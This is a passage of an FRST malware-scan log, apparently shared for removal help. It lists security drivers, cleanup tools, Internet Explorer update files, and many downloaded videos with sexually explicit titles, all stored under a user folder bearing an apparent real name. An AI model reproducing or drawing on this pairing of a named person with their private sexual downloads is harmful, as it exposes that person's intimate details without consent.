R1 SRTSP; C:\Windows\System32\Drivers\N360x64\1506000.020\SRTSP64.SYS [876248 2014-08-25] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\N360x64\1506000.020\SRTSPX64.SYS [37592 2014-08-25] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\drivers\N360x64\1506000.020\SYMDS64.SYS [493656 2013-09-09] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\N360x64\1506000.020\SYMEFA64.SYS [1148120 2014-08-25] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2013-12-27] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\N360x64\1506000.020\Ironx64.SYS [266968 2014-08-06] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\N360x64\1506000.020\SYMNETS.SYS [593112 2014-08-25] (Symantec Corporation)
S1 AntiLog32; \??\C:\Windows\system32\drivers\AntiLog64.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-05 10:36 - 2014-11-05 10:37 - 00000000 ____D () C:\FRST
2014-11-05 10:33 - 2014-11-05 10:33 - 00000000 ___RD () C:\Users\JoseAlcazar\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices
2014-11-04 17:21 - 2014-11-04 17:26 - 635087215 ____R () C:\Users\JoseAlcazar\Downloads\Staxus - Alan Benfelen and Darko Simic Bareback Sex (720p).mp4
2014-11-04 17:20 - 2014-11-04 17:27 - 361453575 ____R () C:\Users\JoseAlcazar\Downloads\College Dudes - Owen Michaels Tops Roman Daniels (720p).mp4
2014-11-04 17:20 - 2014-11-04 17:22 - 308737532 ____R () C:\Users\JoseAlcazar\Downloads\Sweet And Raw - Alan William, Bruno and Gabriel [Bareback - 720p].mp4
2014-11-03 17:55 - 2014-11-03 17:57 - 278031976 ____R () C:\Users\JoseAlcazar\Downloads\sf_gage_joseph.wmv
2014-11-03 17:54 - 2014-11-03 18:00 - 450972087 ____R () C:\Users\JoseAlcazar\Downloads\[helixstudios.net] Lovers' Lookout (Andy Taylor, Troy Ryan).mp4
2014-11-03 17:53 - 2014-11-03 18:10 - 1267006785 ____R () C:\Users\JoseAlcazar\Downloads\[Icon Male] Prisoner Of War (2014).mp4
2014-11-02 13:49 - 2014-11-02 13:54 - 294746656 ____R () C:\Users\JoseAlcazar\Downloads\Tanned Twinks Threesome Fun.mp4
2014-11-02 12:26 - 2014-11-02 12:35 - 1394022488 ____R () C:\Users\JoseAlcazar\Downloads\Baitbus - Anal Pounding on the Baitbus (Paul Canon).mp4
2014-11-02 12:21 - 2014-11-02 12:27 - 490574405 ____R () C:\Users\JoseAlcazar\Downloads\[NextDoorTwink]My Folks Are Out Part Two (Damian Black, Tripp Townsend).mp4
2014-11-02 12:14 - 2014-11-02 12:28 - 490574404 ____R () C:\Users\JoseAlcazar\Downloads\NextDoorBuddies - My Folks Are Out, Part Two - Damian Black and Tripp Townsend.mp4
2014-11-02 12:14 - 2014-11-02 12:25 - 430922040 ____R () C:\Users\JoseAlcazar\Downloads\[NextDoorTwink] Raw Awakening (Trent Ferris, Sam Truitt).mp4
2014-11-01 11:12 - 2014-11-01 11:12 - 00000000 ____D () C:\NPE
2014-11-01 11:11 - 2014-11-01 11:19 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Local\NPE
2014-11-01 10:34 - 2014-11-01 10:37 - 433978146 ____R () C:\Users\JoseAlcazar\Downloads\Guys In Sweatpants - Jordan Barebacks Lukas Live.mp4
2014-11-01 10:32 - 2014-11-02 12:20 - 600955394 ____R () C:\Users\JoseAlcazar\Downloads\William Higgins - Ivan Mraz and Zdenek Bodbaba RAW - FULL CONTACT (720p).mp4
2014-10-31 14:26 - 2014-10-31 14:35 - 1039197249 ____R () C:\Users\JoseAlcazar\Downloads\ManRoyale - Mike Chambers and Calvin Cuffs - Close Shave (720p).mp4
2014-10-31 14:21 - 2014-10-31 14:24 - 501921666 ____R () C:\Users\JoseAlcazar\Downloads\[Broke Straight Boys] Brody Lasko, Ronan Kennedy, David Hardy, Ian Dempsey - Orgy.mp4
2014-10-31 14:20 - 2014-10-31 14:27 - 747348938 ____R () C:\Users\JoseAlcazar\Downloads\Staxus - Jace Reed and Johny Cruz Bareback (720p).mp4
2014-10-31 14:19 - 2014-10-31 14:21 - 365968130 ____R () C:\Users\JoseAlcazar\Downloads\College Dudes - Dante Monroe Tops Taylor Blaise (720p).mp4
2014-10-31 14:18 - 2014-10-31 14:20 - 275528316 ____R () C:\Users\JoseAlcazar\Downloads\[FraternityX] FX104 - Katy's A bleep.mp4
2014-10-31 14:06 - 2014-10-31 14:06 - 00026845 _____ () C:\Users\JoseAlcazar\Desktop\dds.txt
2014-10-31 14:06 - 2014-10-31 14:06 - 00011498 _____ () C:\Users\JoseAlcazar\Desktop\attach.txt
2014-10-30 15:56 - 2014-10-30 15:56 - 00000000 ____D () C:\Program Files (x86)\ESET
2014-10-30 15:45 - 2014-10-30 15:45 - 00000639 _____ () C:\Users\JoseAlcazar\Desktop\JRT.txt
2014-10-30 15:37 - 2014-10-30 15:37 - 00000000 ____D () C:\Windows\ERUNT
2014-10-30 15:26 - 2014-10-30 15:29 - 00000000 ____D () C:\AdwCleaner
2014-10-30 15:26 - 2010-08-30 07:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-10-29 17:30 - 2014-10-29 17:36 - 490853410 ____R () C:\Users\JoseAlcazar\Downloads\Broke Straight Boys - Ayden Troy bleep Brody Lasko.mp4
2014-10-29 17:30 - 2014-10-29 17:35 - 327666191 ____R () C:\Users\JoseAlcazar\Downloads\Jason Sparks Live - Zach Lockhart and Declan McClain BAREBACK in Dallas (720p).mp4
2014-10-29 17:29 - 2014-10-29 17:34 - 411702082 ____R () C:\Users\JoseAlcazar\Downloads\BadPuppy - Farid and Ewin (720p).mp4
2014-10-28 19:43 - 2014-10-28 19:50 - 00002358 _____ () C:\Users\JoseAlcazar\Desktop\Rkill.txt
2014-10-28 18:42 - 2014-10-29 18:51 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-10-28 18:41 - 2014-10-29 18:51 - 00000000 ____D () C:\Users\JoseAlcazar\Desktop\mbar
2014-10-28 18:18 - 2014-11-05 10:33 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-28 18:17 - 2014-10-30 14:50 - 00001108 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-28 18:17 - 2014-10-30 14:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-28 18:17 - 2014-10-30 14:50 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-28 18:17 - 2014-10-01 10:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-28 18:17 - 2014-10-01 10:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-28 18:17 - 2014-10-01 10:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-28 18:14 - 2014-10-28 18:15 - 00047893 _____ () C:\Users\JoseAlcazar\Desktop\Result.txt
2014-10-28 18:13 - 2014-10-28 18:13 - 00002774 _____ () C:\Users\JoseAlcazar\Desktop\FSS.txt
2014-10-27 18:14 - 2014-10-27 18:22 - 813043899 ____R () C:\Users\JoseAlcazar\Downloads\[Extra Big Dicks] Useless Banana (Sam Truit, Trevor Spade).mp4
2014-10-27 18:06 - 2014-10-27 18:19 - 1017683417 ____R () C:\Users\JoseAlcazar\Downloads\Staxus - lan Benfelen, Arthur Kral and Jaro Stone (720p).mp4
2014-10-27 18:05 - 2014-10-27 18:13 - 730396565 ____R () C:\Users\JoseAlcazar\Downloads\Staxus - Carlos Santiago and David Hanson.mp4
2014-10-27 18:04 - 2014-10-27 18:22 - 664328383 ____R () C:\Users\JoseAlcazar\Downloads\Staxus - Devon LeBron, Felipe Esquivel, Tim Law.mp4
2014-10-26 14:13 - 2014-10-26 14:17 - 503681935 ____R () C:\Users\JoseAlcazar\Downloads\[ND] Alex Dupre and Drake Tyler.mp4
2014-10-26 11:07 - 2014-10-26 14:19 - 315312112 ____R () C:\Users\JoseAlcazar\Downloads\MasonWyler - Mason & Anthony.wmv
2014-10-26 10:50 - 2014-10-26 10:51 - 00000000 ____D () C:\Users\JoseAlcazar\Downloads\Helix - 8Teenboy - Yoga Thunder
2014-10-26 10:46 - 2014-10-26 10:46 - 00000000 ____D () C:\Users\JoseAlcazar\Downloads\[Staxus] Lloyd Goldwyn and Tim Law
2014-10-25 18:25 - 2014-10-25 18:25 - 00000000 ____D () C:\ProgramData\Atheros
2014-10-25 18:20 - 2014-10-25 18:20 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BT Program
2014-10-25 18:20 - 2014-10-25 18:20 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Roaming\Atheros
2014-10-25 18:19 - 2012-12-27 04:05 - 00439296 _____ (Atheros) C:\Windows\system32\athihvs.dll
2014-10-25 18:07 - 2014-11-04 18:20 - 00003440 _____ () C:\Windows\System32\Tasks\PCDEventLauncherTask
2014-10-25 18:07 - 2014-10-25 18:07 - 00004010 _____ () C:\Windows\System32\Tasks\PCDoctorBackgroundMonitorTask
2014-10-25 18:07 - 2014-10-25 18:07 - 00003220 _____ () C:\Windows\System32\Tasks\SystemToolsDailyTest
2014-10-25 18:07 - 2014-10-25 18:07 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Roaming\Dell
2014-10-25 18:07 - 2014-10-25 18:07 - 00000000 ____D () C:\ProgramData\PC-Doctor for Windows
2014-10-25 18:07 - 2014-10-25 18:07 - 00000000 ____D () C:\Program Files\My Dell
2014-10-25 18:06 - 2014-10-25 18:07 - 00000000 ____D () C:\Program Files\Dell Support Center
2014-10-25 18:06 - 2014-10-25 18:06 - 00000000 ____D () C:\ProgramData\PCDr
2014-10-25 18:05 - 2014-10-26 11:30 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Roaming\PCDr
2014-10-25 18:03 - 2014-10-25 18:03 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell
2014-10-25 18:03 - 2014-10-25 18:03 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Local\Deployment
2014-10-25 18:03 - 2014-10-25 18:03 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Local\Apps\2.0
2014-10-25 12:22 - 2014-10-25 12:24 - 402018317 ____R () C:\Users\JoseAlcazar\Downloads\Broke Straight Boys - Paul Canon bleep Conner Chesney (720p).mp4
2014-10-24 16:01 - 2014-10-24 16:04 - 288629724 ____R () C:\Users\JoseAlcazar\Downloads\[Staxus] Marty Love, John Parker & Mike Cage.mp4
2014-10-24 15:57 - 2014-10-24 16:00 - 353971131 ____R () C:\Users\JoseAlcazar\Downloads\[FraternityX] FX086 Wake and bleep.mp4
2014-10-24 15:55 - 2014-10-24 16:06 - 783669842 ____R () C:\Users\JoseAlcazar\Downloads\MEN - Drill My Hole - Daddy’s Workplace Part 3  - Johnny Forza & Matthew Ryder.mp4
2014-10-24 15:37 - 2014-11-05 10:33 - 00000000 ___HD () C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2014-10-23 15:53 - 2014-10-23 16:00 - 1089156850 ____R () C:\Users\JoseAlcazar\Downloads\[Staxus] - Alexander Dorch & Jace Reed.mp4
2014-10-23 15:41 - 2014-10-23 15:42 - 176548999 ____R () C:\Users\JoseAlcazar\Downloads\[Hotboys] Brazilian - Ricardo & Matheus.mp4
2014-10-23 15:38 - 2014-10-23 16:00 - 517093257 ____R () C:\Users\JoseAlcazar\Downloads\Helix Studios - Andy Taylor and Bastian Hart -Moving Day (720p).mp4
2014-10-22 18:07 - 2014-10-22 18:14 - 547251344 ____R () C:\Users\JoseAlcazar\Downloads\Randy Blue -2778- Brett Swanson & Ashton Dale.mp4
2014-10-21 18:40 - 2014-10-21 18:46 - 906787096 ____R () C:\Users\JoseAlcazar\Downloads\[Staxus] Carl Bodman & Sven Laarson.mp4
2014-10-21 18:38 - 2014-10-21 18:41 - 00000000 ____D () C:\Users\JoseAlcazar\Downloads\BelAmi Online - Rocco Alfieri, Tom Pollock
2014-10-20 17:08 - 2014-10-20 17:14 - 376903261 ____R () C:\Users\JoseAlcazar\Downloads\Helix - Evan Parker & Collin Payne.mp4
2014-10-20 17:03 - 2014-10-20 17:08 - 741652589 ____R () C:\Users\JoseAlcazar\Downloads\Randy Blue -2777- Scotty Marx & Zane Porter.mp4
2014-10-20 17:00 - 2014-10-20 17:03 - 273361099 ____R () C:\Users\JoseAlcazar\Downloads\Straight Fraternity - JC's First Time.mp4
2014-10-20 16:54 - 2014-10-20 17:04 - 688785307 ____R () C:\Users\JoseAlcazar\Downloads\Counselor week at Camp Liberty.mp4
2014-10-20 16:54 - 2014-10-20 17:03 - 805604166 ____R () C:\Users\JoseAlcazar\Downloads\Staxus - Hot Beach Foursome - Orlando White, Pedro Ribeiro, Micky Taylor & Paul Walker.mp4
2014-10-20 16:51 - 2014-10-20 17:00 - 349632813 ____R () C:\Users\JoseAlcazar\Downloads\GayHoopla - Jeff Niels, Ken Ott and Max Summerfield - Edge of Desire  Part 3 (720p).mp4
2014-10-18 15:27 - 2014-10-18 15:30 - 371996869 ____R () C:\Users\JoseAlcazar\Downloads\[Wank This] Andrew Doncaster Slams Javier Cruz Bareback.mp4
2014-10-18 09:31 - 2014-10-18 15:31 - 224299540 ____R () C:\Users\JoseAlcazar\Downloads\[TIM] It's bleep Big (CHRISTIAN, ESTEBAN).mov
2014-10-18 09:31 - 2014-10-18 09:37 - 377709095 ____R () C:\Users\JoseAlcazar\Downloads\[Dallas Reeves] Donny Forza and Vadim Black Bare Flip.mp4
2014-10-17 17:42 - 2014-09-18 20:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-17 17:36 - 2014-10-17 17:41 - 732691202 ____R () C:\Users\JoseAlcazar\Downloads\MEN - Men Collector Part 2 - Christian Wilde and Tyler Sweet (720p).mp4
2014-10-17 17:32 - 2014-10-17 17:37 - 523164546 ____R () C:\Users\JoseAlcazar\Downloads\Cocky Boys - Pierre Fitch and Jaxon Radoc Flip-bleep (720p).mp4
2014-10-17 17:25 - 2014-10-17 17:40 - 622781052 ____R () C:\Users\JoseAlcazar\Downloads\bleeperMate - David Montenegro and Ian Grey (720p).mp4
2014-10-17 17:24 - 2014-10-17 17:35 - 777155794 ____R () C:\Users\JoseAlcazar\Downloads\[Staxus] Jace Reed, Johny Cruz and Yuri Adamov [Bareback - 720p].mp4
2014-10-17 17:21 - 2014-10-17 17:31 - 1016718711 ____R () C:\Users\JoseAlcazar\Downloads\BelAmiOnline - 9235 - Sex Scenes, Condom Free; Jean-Daniel & Rhys Jagger 20140622 (FHDQ, 22,01 min).mp4
2014-10-17 17:21 - 2014-10-17 17:25 - 268899801 ____R () C:\Users\JoseAlcazar\Downloads\[FraternityX] FX098 - Ass to Mouth - ATM.mp4
2014-10-17 17:21 - 2014-10-17 17:24 - 265072239 ____R () C:\Users\JoseAlcazar\Downloads\Broke Straight Boys - Blake Savage bleep Brandon Beal Raw.mp4
2014-10-17 17:19 - 2014-10-17 17:19 - 00000000 ____D () C:\Users\JoseAlcazar\AppData\Roaming\Oracle
2014-10-17 17:18 - 2014-10-17 17:18 - 00272808 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2014-10-17 17:18 - 2014-10-17 17:18 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe
2014-10-17 17:18 - 2014-10-17 17:18 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe
2014-10-17 17:18 - 2014-10-17 17:18 - 00098216 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2014-10-17 17:18 - 2014-10-17 17:18 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-10-17 17:18 - 2014-10-17 17:18 - 00000000 ____D () C:\Program Files (x86)\Java
2014-10-16 10:37 - 2014-10-16 10:37 - 00000000 __SHD () C:\Users\JoseAlcazar\AppData\Local\EmieUserList
2014-10-16 10:37 - 2014-10-16 10:37 - 00000000 __SHD () C:\Users\JoseAlcazar\AppData\Local\EmieSiteList
2014-10-16 10:37 - 2014-10-16 10:37 - 00000000 ____D () C:\Windows\System32\Tasks\Norton Security Suite
2014-10-16 10:15 - 2014-10-16 10:15 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-16 10:15 - 2014-10-16 10:15 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-16 10:15 - 2014-10-16 10:15 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-16 10:15 - 2014-10-16 10:15 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-16 10:15 - 2014-10-16 10:15 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00942592 _____ (Microsoft Corporation) C:\Windows\system32\jsIntl.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00774144 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00645120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsIntl.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00616104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dat
2014-10-16 10:15 - 2014-10-16 10:15 - 00616104 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dat
2014-10-16 10:15 - 2014-10-16 10:15 - 00610304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00413696 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2014-10-16 10:15 - 2014-10-16 10:15 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2014-10-16 10:15 - 2014-10-16 10:15 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00247808 _____ (Microsoft Corporation) C:\Windows\system32\msls31.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00235008 _____ (Microsoft Corporation) C:\Windows\system32\elshyph.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00233472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00208384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00194048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\elshyph.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00182272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msls31.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00167424 _____ (Microsoft Corporation) C:\Windows\system32\iexpress.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00151552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iexpress.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00147968 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00143872 _____ (Microsoft Corporation) C:\Windows\system32\wextract.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00139264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wextract.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00131072 _____ (Microsoft Corporation) C:\Windows\system32\IEAdvpack.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00127488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00116736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iepeers.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00111616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IEAdvpack.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00105984 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00101376 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\SetIEInstalledDate.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00086016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesysprep.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\RegisterIEPKEYs.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00083456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\icardie.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2014-10-16 10:15 - 2014-10-16 10:15 - 00074240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SetIEInstalledDate.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00071680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RegisterIEPKEYs.exe
2014-10-16 10:15 - 2014-10-16 10:15 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00069120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardie.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2014-10-16 10:15 - 2014-10-16 10:15 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\pngfilt.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00056832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pngfilt.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00048640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmler.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\mshtmler.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00048128 _____ (Microsoft Corporation) C:\Windows\system32\imgutil.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imgutil.dll
2014-10-16 10:15 - 2014-10-16 10:15 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
